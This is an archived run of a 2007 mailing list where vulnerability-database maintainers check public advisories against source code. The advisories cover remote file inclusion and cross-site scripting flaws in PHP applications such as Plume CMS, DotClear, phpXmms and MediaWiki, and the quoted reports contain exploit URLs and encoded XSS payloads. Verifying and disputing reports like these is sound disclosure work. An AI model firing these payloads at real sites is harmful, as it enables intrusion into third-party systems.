<1834.24.70.141.188.1171613243.squirrel@mail.bughunter.ca> Ok, this is my favourite of all time: Note that an encrypted Kwik-Pay database cannot be compressed by the backup process in Kwik-Pay and therefore will not fit on a floppy disk. The password you enter will be requested every time you open the payroll. If you forget the password you will not be able to access the data. To unencrypt an encrypted Kwik-Pay database, leave the password blank and then click OK. So 1) if you encrypt NO backup 2) to decrypt just leave the password blank......wow....and this 'dude' was acting very undudely over a filename? Best not be messin' with them OSVDB gangstas. JS > > On Thu, 15 Feb 2007, Steve Tornio wrote: > >> Oh well, he also said I need to find a more productive use of my time. >> Like not continuing my discussion with him, I think :) > > There I go, not having an opinion again. > > - Steve > From ge at linuxbox.org Fri Feb 16 03:04:45 2007 From: ge at linuxbox.org (Gadi Evron) Date: Fri, 16 Feb 2007 02:04:45 -0600 (CST) Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay) In-Reply-To: <1834.24.70.141.188.1171613243.squirrel@mail.bughunter.ca> Message-ID: On Fri, 16 Feb 2007, Justin Seitz wrote: > Ok, this is my favourite of all time: > > Note that an encrypted Kwik-Pay database cannot be compressed by the > backup process in Kwik-Pay and therefore will not fit on a floppy disk. > > The password you enter will be requested every time you open the payroll. > If you forget the password you will not be able to access the data. > > To unencrypt an encrypted Kwik-Pay database, leave the password blank and > then click OK. > > > So 1) if you encrypt NO backup 2) to decrypt just leave the password > blank......wow....and this 'dude' was acting very undudely over a > filename? Best not be messin' with them OSVDB gangstas. One time I was doing forensics on a win95 box. I thought: hey, there gotta be a way to get around the password protection without shutting it off.. Then we clicked on ESC. > JS > > > > > On Thu, 15 Feb 2007, Steve Tornio wrote: > > > >> Oh well, he also said I need to find a more productive use of my time. > >> Like not continuing my discussion with him, I think :) > > > > There I go, not having an opinion again. > > > > - Steve > > > > From coley at linus.mitre.org Fri Feb 16 03:26:36 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 16 Feb 2007 03:26:36 -0500 (EST) Subject: [VIM] [OT] Beers in Virginia In-Reply-To: <200702151644.41207.aviram@beyondsecurity.com> References: <200702151644.41207.aviram@beyondsecurity.com> Message-ID: I expect to be at Black Hat Federal around Feb 28-Mar 1 (I'm fuzzy on the dates), maybe we could set something up then? I'm not sure who else on the list is in the VA area. - Steve From theall at tenablesecurity.com Fri Feb 16 12:37:02 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 16 Feb 2007 12:37:02 -0500 Subject: [VIM] PBLang 4.60 <= (index.php) Remote File Include Vulnerability Message-ID: <45D5EBBE.80408@tenablesecurity.com> This concerns the remote file include reported in PBLang here: http://www.securityfocus.com/archive/1/460315/30/0/threaded The code in index.php starts with: require ('header.php'); include("global.php"); include($dbpath."/settings.php"); header.php just sets some http headers, starts a session, and other sorts of housekeeping; it doesn't reference $dbpath or include other files. global.php doesn't exist out of the box but gets created as part of the install to initialize constants, including $dbpath. At least as created, it does not give a remote user any way to overwrite the setting for $dbpath or use it, even indirectly. So this report looks bogus to me. Btw, the download link in the advisory leads to version 4.65 as part the enclosed docs/PBLang-update.txt (look at the bottom), not 4.60 as claimed in the posting. George -- theall at tenablesecurity.com From smoore at securityglobal.net Fri Feb 16 14:16:38 2007 From: smoore at securityglobal.net (Stuart Moore) Date: Fri, 16 Feb 2007 14:16:38 -0500 Subject: [VIM] false: Plume CMS 1.2.2 < = RFi Vulnerabilities Message-ID: <45D60316.1040101@securityglobal.net> plume\manager\articles.php: require_once 'path.php'; require_once $_PX_config['manager_path'].'/prepend.php'; require_once $_PX_config['manager_path'].'/inc/class.article.php'; path.php: $_PX_config['manager_path'] = dirname(__FILE__); Stuart ------ ################################################################## #Plume CMS 1.2.2 < = RFi Vulnerabilities # #Download : http://prdownloads.sourceforge.net/pxsystem/plume-1.2.2.zip?download # #Script Name : Plume CMS 1.2.2 # # ################################################################## # #Coded By : KaRTaL # # #Contact : k4rtal[at]gmail[dot]com # # ################################################################## # #V.Code in : plume\manager\articles.php # # # require_once $_PX_config['manager_path'].'/inc/class.article.php'; # # #Exploit : www.target.com/manager/articles.php?_PX_config[manager_path]=[shell] # # ################################################################## # # #Gretz : TiT , Doublekickx , str0ke , DermanTukr , M3rhametsiz , CaCa , Gurkan142 , www.istikla-team.org # # # # ################################################################## From theall at tenablesecurity.com Fri Feb 16 14:51:40 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 16 Feb 2007 14:51:40 -0500 Subject: [VIM] false: Drake CMS v0.3.2 < = RFi Vulnerabilities Message-ID: <45D60B4C.7030702@tenablesecurity.com> Source for 0.3.2 can be obtained from: http://puzzle.dl.sourceforge.net/sourceforge/drakecms/drake_0.3.2_beta_rev1306.tar.gz admin/includes/header.php starts with: Message-ID: The download links is for the wrong app, but dotclear 1.2.5 is pretty clearly the app being talked about. index.php includes: # Chemin vers la racine de l'application (si vous changer le fichier de place) $app_path = '/'; # Si par exemple vous mettez blog.php la racine de votre site et que DotClear # se trouve dans /dotclear vous pouvez dcommenter cette ligne : //$app_path = '/dotclear/'; # NE RIEN CHANGER APRES CETTE LIGNE $blog_file_path = __FILE__; $blog_dc_path = dirname(__FILE__).$app_path; require $blog_dc_path.'/layout/prepend.php'; include $dc_template_file; require $blog_dc_path.'/layout/append.php'; 1. blog_dc_path is clearly defined 2. $dc_template_file is defined in layout/prepend.php, built from the previously-defined $blog_dc_path 3. prepend.php includes a bunch of stuff using dirname(__FILE__) - none of those files include/require other files 3. append.php only closes a filehandle. index.php?blog_dc_path isn't an issue, and it doesn't look like other variables aren't either. Begin forwarded message: > From: k4rtal at gmail.com > Date: 17 February , 2007 02:59:07 MST (CA) > To: bugtraq at securityfocus.com > Subject: DotClear v1.2.5 > Message-Id: <20070217095907.30235.qmail at securityfocus.com> > > ################################################################# > > # > #DotClear v1.2.5 < = RFi Vulnerabilities ( KaRTaL ) > # > #Download : http://www.spacemarc.it/scriptphp/index.php? > script=meganoidesnews111 > # > #Script Name : DotClear v1.2.5 > # > # > ################################################################# > > # > # > #Coded By : KaRTaL > # > # > #Contact : k4rtal[at]gmail[dot]com > # > # > ################################################################# > > # > # > #V.Code in : [path]/index.php > # > # > # require $blog_dc_path.'/layout/append.php'; > # > # > #Exploit : www.target.com/path/index.php?blog_dc_path=[shell] > # > # > ################################################################# > > # > # > # > #Gretz : Doublekickx , D3ngsz , ERNE , DermanTurK , M3rhametsiz , > CaCa , Gurkan142 , www.istikla-team.org > # > # > # > # > ################################################################# > -- Brent Graveland brentg at securityfocus.com -------------- next part -------------- A non-text attachment was scrubbed... Name: PGP.sig Type: application/pgp-signature Size: 186 bytes Desc: This is a digitally signed message part Url : http://www.attrition.org/pipermail/vim/attachments/20070217/717c03d9/attachment-0001.bin From jericho at attrition.org Tue Feb 20 02:01:37 2007 From: jericho at attrition.org (security curmudgeon) Date: Tue, 20 Feb 2007 02:01:37 -0500 (EST) Subject: [VIM] 26226: abarcar Realty Portal content.php cat Variable SQL Injection (fwd) Message-ID: ---------- Forwarded message ---------- From: Helmut P. Fleischhauer To: moderators at osvdb.org Date: Sat, 02 Dec 2006 18:21:25 +0100 Reply-To: moderators at osvdb.org Subject: [OSVDB Mods] [Change Request] 26226: abarcar Realty Portal content.php cat Variable SQL Injection 1. The current version of the software is 7.2 Since version 7.0, released over 6 months ago, static pages are created and no appended values are used. 2. The version 5.1.5 is not in use since end of 2003 3. Above test was NOT made with a Realty Portal package as there is no package of this version available online Referring to the Realty Portal software is false 4. abarcar Software was not informed prior to publication Sincerely Helmut P. Fleischhauer abarcar Software Mulknitzer Dorfstr. 11 03149 Forst Germany Phone.: +49 3562 693532 info at abarcar.com http://www.abarcar.com From noamr at beyondsecurity.com Tue Feb 20 05:07:11 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Tue, 20 Feb 2007 12:07:11 +0200 Subject: [VIM] [True] Meganoide's news v1.1.1 < = RFi Vulnerabilities Message-ID: <200702201207.12015.noamr@beyondsecurity.com> Hi, Vendor appears to confirm problem: ---------------------- Meganoide's news v1.1.2 ----------------------- - Bug: possibile inclusione di file remoti nel file "include.php" (Translation from italian: possible inclusion of files remotely in the file "include.php") ---------- Forwarded Message ---------- Subject: Meganoide's news v1.1.1 < = RFi Vulnerabilities Date: Friday 16 February 2007 19:54 From: k4rtal at gmail.com To: bugtraq at securityfocus.com ################################################################## #Meganoide's news v1.1.1 < = RFi Vulnerabilities # #Download : http://www.spacemarc.it/scriptphp/index.php?script=meganoidesnews111 # #Script Name : Meganoide's news v1.1.1 # # ################################################################## # #Coded By : KaRTaL # # #Contact : k4rtal[at]gmail[dot]com # # ################################################################## # #V.Code in : [path]/include.php # # # include("$_SERVER[DOCUMENT_ROOT]/news/config.inc.php"); # # #Exploit : www.target.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell] # # ################################################################## # # #Gretz : TiT , Doublekickx , str0ke , DermanTukr , M3rhametsiz , CaCa , Gurkan142 , www.istikla-team.org # # # # ################################################################## ------------------------------------------------------- -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com From noamr at beyondsecurity.com Tue Feb 20 06:07:06 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Tue, 20 Feb 2007 13:07:06 +0200 Subject: [VIM] [TRUE] CedStat v1.31 XSS Message-ID: <200702201307.06935.noamr@beyondsecurity.com> Hi, The vulnerability is true - found it in the Internet, the product appears to be "non-existing" or at least no longer available. BTW: Accessing http://intranet.ac-nancy-metz.fr/cedstat/ returns: Perdu sur l'Internet ? Pas de panique, on va vous aider * <----- vous ?tes ici Anyone read french? ---------- Forwarded Message ---------- Subject: CedStat v1.31 XSS Date: Friday 16 February 2007 00:30 From: sn0oPy.team at gmail.com To: bugtraq at securityfocus.com * CedStat v1.31 XSS * By : sn0oPy * Risk : low * site : http://cedtat.free.fr * exploit : http://www.target.ma/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20 %62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E Dork : inurl:"/cedstat/" * contact : sn0oPy at avenir-geopolitique.net * greetz : [subzero], http://forums.avenir-geopolitique.net. reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2672 ------------------------------------------------------- -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com From str0ke at milw0rm.com Tue Feb 20 12:45:05 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 20 Feb 2007 11:45:05 -0600 Subject: [VIM] [True] Meganoide's news v1.1.1 < = RFi Vulnerabilities In-Reply-To: <200702201207.12015.noamr@beyondsecurity.com> References: <200702201207.12015.noamr@beyondsecurity.com> Message-ID: <814b9d50702200945v552e4d4che718209f0b42cc22@mail.gmail.com> _SERVER[DOCUMENT_ROOT]=[shell] Isn't only certain versions of php vulnerable to this kind of attack? /str0ke On 2/20/07, Noam Rathaus wrote: > Hi, > > Vendor appears to confirm problem: > ---------------------- > Meganoide's news v1.1.2 > ----------------------- > - Bug: possibile inclusione di file remoti nel file "include.php" > > (Translation from italian: possible inclusion of files remotely in the > file "include.php") > > ---------- Forwarded Message ---------- > > Subject: Meganoide's news v1.1.1 < = RFi Vulnerabilities > Date: Friday 16 February 2007 19:54 > From: k4rtal at gmail.com > To: bugtraq at securityfocus.com > > ################################################################## > #Meganoide's news v1.1.1 < = RFi Vulnerabilities > # > #Download : > http://www.spacemarc.it/scriptphp/index.php?script=meganoidesnews111 # > #Script Name : Meganoide's news v1.1.1 > # > # > ################################################################## > # > #Coded By : KaRTaL > # > # > #Contact : k4rtal[at]gmail[dot]com > # > # > ################################################################## > # > #V.Code in : [path]/include.php > # > # > # include("$_SERVER[DOCUMENT_ROOT]/news/config.inc.php"); > # > # > #Exploit : www.target.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell] > # > # > ################################################################## > # > # > #Gretz : TiT , Doublekickx , str0ke , DermanTukr , M3rhametsiz , CaCa , > Gurkan142 , www.istikla-team.org # > # > # > # > ################################################################## > > ------------------------------------------------------- > > -- > Noam Rathaus > CTO > 1616 Anderson Rd. > McLean, VA 22102 > Tel: 703.286.7725 extension 105 > Fax: 888.667.7740 > noamr at beyondsecurity.com > http://www.beyondsecurity.com > From noamr at beyondsecurity.com Tue Feb 20 13:30:23 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Tue, 20 Feb 2007 20:30:23 +0200 Subject: [VIM] [unsure] MediaWiki Cross-site Scripting Message-ID: <200702202030.23410.noamr@beyondsecurity.com> Anyone able to confirm this? I can't. ---------- Forwarded Message ---------- Subject: MediaWiki Cross-site Scripting Date: Tuesday 20 February 2007 06:29 From: eyal at bugsec.com To: bugtraq at securityfocus.com MediaWiki Cross-site Scripting Vulnerabilities. Date: 18/02/2007 Vendor: MediaWiki Vulnerable versions: MediaWiki 1.9.2 (latest) and below. Description: MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting attack by expliting the experimental AJAX features, if enabled (default). This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, 1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. note: browsers encoding auto-detection has to be enabled for successful explitation. Proof-of-concept: http://[Host]/wiki/index.php?action=ajax&rs=[XSS] UTF-7 XSS in post 1.8.2 versions. Examples: v1.8.2 and below: http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://w ww.bugsec.com')%3C/script%3E v1.8.3 - v1.9.2 http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http ://www.bugsec.com');+ADw-/SCRIPT+AD4- http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%5 4%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53% 43%52%49%50%54%2B%41%44%34%2D (URL Encoded) Credit: Moshe BA from BugSec Tel:+972-3-9622655 Email: Info [^A-t] BugSec \*D.O.T*\ com BugSec LTD. - www.BugSec.com http://www.bugsec.com/articles.php?Security=24 ------------------------------------------------------- -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com From str0ke at milw0rm.com Tue Feb 20 14:09:20 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 20 Feb 2007 13:09:20 -0600 Subject: [VIM] false: phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities Message-ID: <814b9d50702201109h54fd6592uc2c202ddd7b9f565@mail.gmail.com> the config.php file contains the below which pretty much blocks a rfi. /dev/null"; ?> ------------------------------------------------------------------------------------------------------------------- AYYILDIZ.ORG PreSents... Script: phpXmms 1.0 Script Download: ftp://ftp.warpedsystems.sk.ca/pub/php/phpxmms-1.0.tar.gz Contact: ilker Kandemir Code: include($tcmdp); ------------------------------------------------------------------------------------------------------------------- Exploit: phpxmmsb.php?tcmdp=http://attacker.txt? phpxmmst.php?tcmdp=http://attacker.txt? ------------------------------------------------------------------------------------------------------------------- Tnx:H0tturk,Asianeagle,ajann,Str0ke . Special Tnx: AYYILDIZ.ORG From sullo at cirt.net Tue Feb 20 19:09:47 2007 From: sullo at cirt.net (Sullo) Date: Tue, 20 Feb 2007 19:09:47 -0500 Subject: [VIM] [unsure] MediaWiki Cross-site Scripting In-Reply-To: <200702202030.23410.noamr@beyondsecurity.com> References: <200702202030.23410.noamr@beyondsecurity.com> Message-ID: <45DB8DCB.7020600@cirt.net> $wgUseAjax is off by default--in fact in my install I don't even have that in the config file. I didn't try very hard, but I couldn't get it to work either (after turning wgUseAjax on). Noam Rathaus wrote: > Anyone able to confirm this? I can't. > > ---------- Forwarded Message ---------- > > Subject: MediaWiki Cross-site Scripting > Date: Tuesday 20 February 2007 06:29 > From: eyal at bugsec.com > To: bugtraq at securityfocus.com > > MediaWiki Cross-site Scripting > > Vulnerabilities. > > > Date: > 18/02/2007 > > Vendor: > MediaWiki > > Vulnerable versions: > MediaWiki 1.9.2 (latest) and below. > > Description: > MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting > attack by expliting the experimental AJAX features, if enabled (default). > This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, > 1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. note: > browsers encoding auto-detection has to be enabled for successful > explitation. > > > Proof-of-concept: > http://[Host]/wiki/index.php?action=ajax&rs=[XSS] > UTF-7 XSS in post 1.8.2 versions. > > Examples: > v1.8.2 and below: > http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://w > ww.bugsec.com')%3C/script%3E v1.8.3 - v1.9.2 > http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http > ://www.bugsec.com');+ADw-/SCRIPT+AD4- > http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%5 > 4%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53% > 43%52%49%50%54%2B%41%44%34%2D (URL Encoded) > > > Credit: > Moshe BA from BugSec > Tel:+972-3-9622655 > Email: Info [^A-t] BugSec \*D.O.T*\ com > BugSec LTD. - www.BugSec.com > http://www.bugsec.com/articles.php?Security=24 > > ------------------------------------------------------- > > -- http://www.cirt.net/ | http://www.osvdb.org/ From sullo at cirt.net Wed Feb 21 00:32:47 2007 From: sullo at cirt.net (Sullo) Date: Wed, 21 Feb 2007 00:32:47 -0500 Subject: [VIM] [unsure] MediaWiki Cross-site Scripting In-Reply-To: <45DB8DCB.7020600@cirt.net> References: <200702202030.23410.noamr@beyondsecurity.com> <45DB8DCB.7020600@cirt.net> Message-ID: <45DBD97F.4010900@cirt.net> And I stand corrected: An XSS injection vulnerability based on Microsoft Internet Explorer's UTF-7 charset autodetection was located in the AJAX support module, affecting MSIE users on MediaWiki 1.6.x and up when the optional setting $wgUseAjax is enabled. ... http://svn.wikimedia.org/svnroot/mediawiki/tags/REL1_9_3/phase3/RELEASE-NOTES Sullo wrote: > $wgUseAjax is off by default--in fact in my install I don't even have > that in the config file. > > I didn't try very hard, but I couldn't get it to work either (after > turning wgUseAjax on). > > > Noam Rathaus wrote: > >> Anyone able to confirm this? I can't. >> >> ---------- Forwarded Message ---------- >> >> Subject: MediaWiki Cross-site Scripting >> Date: Tuesday 20 February 2007 06:29 >> From: eyal at bugsec.com >> To: bugtraq at securityfocus.com >> >> MediaWiki Cross-site Scripting >> >> Vulnerabilities. >> >> >> Date: >> 18/02/2007 >> >> Vendor: >> MediaWiki >> >> Vulnerable versions: >> MediaWiki 1.9.2 (latest) and below. >> >> Description: >> MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting >> attack by expliting the experimental AJAX features, if enabled (default). >> This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, >> 1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. note: >> browsers encoding auto-detection has to be enabled for successful >> explitation. >> >> >> Proof-of-concept: >> http://[Host]/wiki/index.php?action=ajax&rs=[XSS] >> UTF-7 XSS in post 1.8.2 versions. >> >> Examples: >> v1.8.2 and below: >> http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://w >> ww.bugsec.com')%3C/script%3E v1.8.3 - v1.9.2 >> http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http >> ://www.bugsec.com');+ADw-/SCRIPT+AD4- >> http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%5 >> 4%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53% >> 43%52%49%50%54%2B%41%44%34%2D (URL Encoded) >> >> >> Credit: >> Moshe BA from BugSec >> Tel:+972-3-9622655 >> Email: Info [^A-t] BugSec \*D.O.T*\ com >> BugSec LTD. - www.BugSec.com >> http://www.bugsec.com/articles.php?Security=24 >> >> ------------------------------------------------------- >> >> >> > > > -- http://www.cirt.net/ | http://www.osvdb.org/ From str0ke at milw0rm.com Wed Feb 21 10:46:34 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 21 Feb 2007 09:46:34 -0600 Subject: [VIM] false: Openads-2.3.31-alpha-pr2 (lib-ftp.inc.php) Remot File Include Message-ID: <814b9d50702210746u9ccb69ia0571146d16ca3d8@mail.gmail.com> fopen is inside of a function that is never called in the script. /str0ke ###################################################### # # Openads-2.3.31-alpha-pr2 # # Class: File Include Vulnerability # Published 2007-02-21 # Remote: Yes # Critical Level : Dangerous # Site: http://www.openads.org/downloads/download-openads-2.3.html ###################################################### file's ; lib-ftp.inc.php ====================================================== Vuln Code @fopen($localfile, "w"); ======================================================= Exploit : Http:// www.Victem.com / [Openads-2.3.31-alpha-pr2] /max-v0.3.31-alpha-pr2/www/admin/lib-ftp.inc.php?ilocalfile=shellcode From str0ke at milw0rm.com Wed Feb 21 10:52:24 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 21 Feb 2007 09:52:24 -0600 Subject: [VIM] false: Simpleshout sboard.php Remote File Inclusion Message-ID: <814b9d50702210752l5c0059ffr3d27fc1aa181f779@mail.gmail.com> First lines of code are below: $config = "config.php"; // Require files require $config; The config variable is initialized. /str0ke Simpleshout sboard.php Remote File Inclusion -==----------------------------------------- -==----------------------------------------- download script=http://scripts.ringsworld.com/chat-scripts/simpleshout-1.6.0 file affected:sboard.php -==--------------------- c0de: I see that some distros are just getting around to patching the zlib_inflate vulnerability (CVE-2006-5823). In the past, zlib has been associated with some major security exposures, and so it surprises me that this has been (largely) played down without attention as a bug that allows you to bring down a box by mounting a crafted file system that, oh-by-the-way, happens to use zlib. Is anybody aware of other (promising or disastrous, depending on how you look at it) potential exploit vectors for this beyond kernel-mode file system code -- e.g., network client libraries? If not, is anyone aware of why it seems this hole got so little attention? Is it sufficiently hard to trigger that most environments wouldn't allow exploitation? From ge at linuxbox.org Wed Feb 21 18:30:04 2007 From: ge at linuxbox.org (Gadi Evron) Date: Wed, 21 Feb 2007 17:30:04 -0600 (CST) Subject: [VIM] CVE-2006-5823 (zlib_inflate): Alternate Vectors? In-Reply-To: Message-ID: As a general note on our unrelated conversation, Matt: the Vista issue is serious. On Wed, 21 Feb 2007, Matthew Murphy wrote: > I see that some distros are just getting around to patching the > zlib_inflate vulnerability (CVE-2006-5823). In the past, zlib has > been associated with some major security exposures, and so it > surprises me that this has been (largely) played down without > attention as a bug that allows you to bring down a box by mounting a > crafted file system that, oh-by-the-way, happens to use zlib. > > Is anybody aware of other (promising or disastrous, depending on how > you look at it) potential exploit vectors for this beyond kernel-mode > file system code -- e.g., network client libraries? If not, is anyone > aware of why it seems this hole got so little attention? Is it > sufficiently hard to trigger that most environments wouldn't allow > exploitation? > From jericho at attrition.org Wed Feb 21 23:46:36 2007 From: jericho at attrition.org (security curmudgeon) Date: Wed, 21 Feb 2007 23:46:36 -0500 (EST) Subject: [VIM] Vendor dispute for Animated Smiley Generator RFI (CVE-2006-6541) In-Reply-To: References: <200612261947.kBQJldde021373@faron.mitre.org> Message-ID: Late reply I know but.. : Here's a vendor URL containing the dispute: : : http://www.smileygenerator.us/sales/index.php?act=viewProd&productId=8 : : Security reports of file include vulnerabilities for the Animated Smiley : Generator are applicable only to the "nulled" version of this : appliication being circulated by warez sites. Legitimate copies will not : allow this exploit! Curious how this came to be. Did someone add a vulnerability to a copy before sharing it and letting it circulate in the warez circles? From coley at mitre.org Thu Feb 22 00:30:19 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 22 Feb 2007 00:30:19 -0500 (EST) Subject: [VIM] Source verify and clarification of old bookmark4u SQL injection Message-ID: <200702220530.l1M5UJn7018212@faron.mitre.org> Ref: FULLDISC:20060420 Sql Injection in BookMark4u URL: http://marc.theaimsgroup.com/?l=full-disclosure&m=114555163911635&w=2 1) This is abandonware. Last version was in 2003 and site says "This Project will NOT be updated ANY MORE." See: http://sourceforge.net/project/showfiles.php?group_id=29784 2) Some VDB's mention the "mode" parameter being affected, but this appears erroneous. Only mentions of $mode in config.php are: $mode = $HTTP_POST_VARS[mode]; ... if ($mode == 'sqlexec') { 3) sqlcmd vector verified by source inspection: $sqlcmd = $HTTP_POST_VARS[sqlcmd]; ... if ($mode == 'sqlexec') { if (get_magic_quotes_gpc()) { $sqlcmd = ereg_replace("\\\\", "", $sqlcmd); } $qry = ereg_replace("%NL%", "\n", $sqlcmd); # decode newline(\n) chars ... $qry_list = explode(";", $qry); # split multiple queries for ($i = 0; $i < sizeof($qry_list); $i++) { $qry_one = trim($qry_list[$i]); if (!$qry_one) continue; $adminMgr->executeMiscQuery($qry_one); You know the rest. Bill H will no doubt love the "%NL%" touch. At first glance, this didn't seem to require authentication or authorization, but I didn't look too close. 4) As might be expected for ancient PHP code, be careful when you look at the source, or you might step in some RFI. - Steve From coley at linus.mitre.org Thu Feb 22 00:41:19 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 22 Feb 2007 00:41:19 -0500 (EST) Subject: [VIM] Vendor dispute for Animated Smiley Generator RFI (CVE-2006-6541) In-Reply-To: References: <200612261947.kBQJldde021373@faron.mitre.org> Message-ID: On Wed, 21 Feb 2007, security curmudgeon wrote: > Curious how this came to be. Did someone add a vulnerability to a copy > before sharing it and letting it circulate in the warez circles? I'm pretty sure this wasn't the first, nor the last, case of a vulnerability in a Trojaned warez product that wasn't in the legitimate product (assuming the vendor dispute is correct). Maybe some of our disputes are actually assumintg legitimate distributions. I don't think CVE should be tracking malicious modifications from unofficial channels. Now, if a product is trojaned at its legitimate distribution point, that's of concern to consumers and gets a CVE. But modified warez falls under the malware category, for me anyway. Would OSVDB be interested in cataloging vulnerabilities in malware? They're technically vulnerabilities from the malware's point of view, after all ;-) Gadi - any insights into warez backdoors? I know I've run into one or two PHP warez sites out there. - Steve From jericho at attrition.org Thu Feb 22 00:47:06 2007 From: jericho at attrition.org (security curmudgeon) Date: Thu, 22 Feb 2007 00:47:06 -0500 (EST) Subject: [VIM] Vendor dispute for Animated Smiley Generator RFI (CVE-2006-6541) In-Reply-To: References: <200612261947.kBQJldde021373@faron.mitre.org> Message-ID: : > Curious how this came to be. Did someone add a vulnerability to a copy : > before sharing it and letting it circulate in the warez circles? : : I'm pretty sure this wasn't the first, nor the last, case of a : vulnerability in a Trojaned warez product that wasn't in the legitimate : product (assuming the vendor dispute is correct). Maybe some of our : disputes are actually assumintg legitimate distributions. This came to mind and was part of the reason I asked. We know that a lot of vulnerabilities are discovered by testing live sites. We know that there is a lot of animosity and petty revenge in the world of hackers. We also know that a lot of hackers don't always opt to pay for software. Add it all up and I have to wonder if some of the warez versions are being backdoored in this manner to help avoid any accusation that was done on purpose, and then later being discovered when one tries to hack another. : I don't think CVE should be tracking malicious modifications from : unofficial channels. Now, if a product is trojaned at its legitimate : distribution point, that's of concern to consumers and gets a CVE. But Right, i'd definitely track such occurances if a legitimate distro is backdoored in such a fashion. : modified warez falls under the malware category, for me anyway. Would : OSVDB be interested in cataloging vulnerabilities in malware? They're : technically vulnerabilities from the malware's point of view, after all : ;-) If the software is being distributed, even via warez channels, and installed and used on real servers with net access, it seems just as valid as any other distribution with a vulnerability. I would also say that if it is known to only affect a given distro, then it should certainly be noted in the VDB entry. From ge at linuxbox.org Thu Feb 22 03:20:48 2007 From: ge at linuxbox.org (Gadi Evron) Date: Thu, 22 Feb 2007 02:20:48 -0600 (CST) Subject: [VIM] Vendor dispute for Animated Smiley Generator RFI (CVE-2006-6541) In-Reply-To: Message-ID: On Thu, 22 Feb 2007, Steven M. Christey wrote: > > On Wed, 21 Feb 2007, security curmudgeon wrote: > > > Curious how this came to be. Did someone add a vulnerability to a copy > > before sharing it and letting it circulate in the warez circles? > > I'm pretty sure this wasn't the first, nor the last, case of a > vulnerability in a Trojaned warez product that wasn't in the legitimate > product (assuming the vendor dispute is correct). Maybe some of our > disputes are actually assumintg legitimate distributions. > > I don't think CVE should be tracking malicious modifications from > unofficial channels. Now, if a product is trojaned at its legitimate > distribution point, that's of concern to consumers and gets a CVE. But > modified warez falls under the malware category, for me anyway. Would > OSVDB be interested in cataloging vulnerabilities in malware? They're > technically vulnerabilities from the malware's point of view, after all > ;-) > > Gadi - any insights into warez backdoors? I know I've run into one or two > PHP warez sites out there. Yes, people are already compromised if they get to that point. Usually though there will be other binaries in the directory and use of file infectors would be made. In most other cases the download would be a fake and actually a malware. Of more effect are vulnerabilities in spyware.. > > - Steve > From noamr at beyondsecurity.com Thu Feb 22 05:38:27 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Thu, 22 Feb 2007 12:38:27 +0200 Subject: [VIM] [true] phpTrafficA-1.4.1 Local File Inclusion Message-ID: <200702221238.27708.noamr@beyondsecurity.com> Appears to be true, however most PHP installation prevent such abuse as 'open_basedir restriction in effect' by default. ---------- Forwarded Message ---------- Subject: phpTrafficA-1.4.1 Local File Inclusion Date: Wednesday 21 February 2007 21:26 From: "bugtraq ir" To: het_ebadi at yahoo.com phpTrafficA-1.4.1 Local File Inclusion phpTrafficA is a GPL statistical tool for web traffic analysis, written in php and mySQL. It can track access counts to your website, search engines, keywords, and referrers that lead to you, operating systems, web browsers, visitor retention, path analysis, and a lot more! http://soft.zoneo.net/phpTrafficA/ Credit: The information has been provided by Hamid Ebadi The original article can be found at : 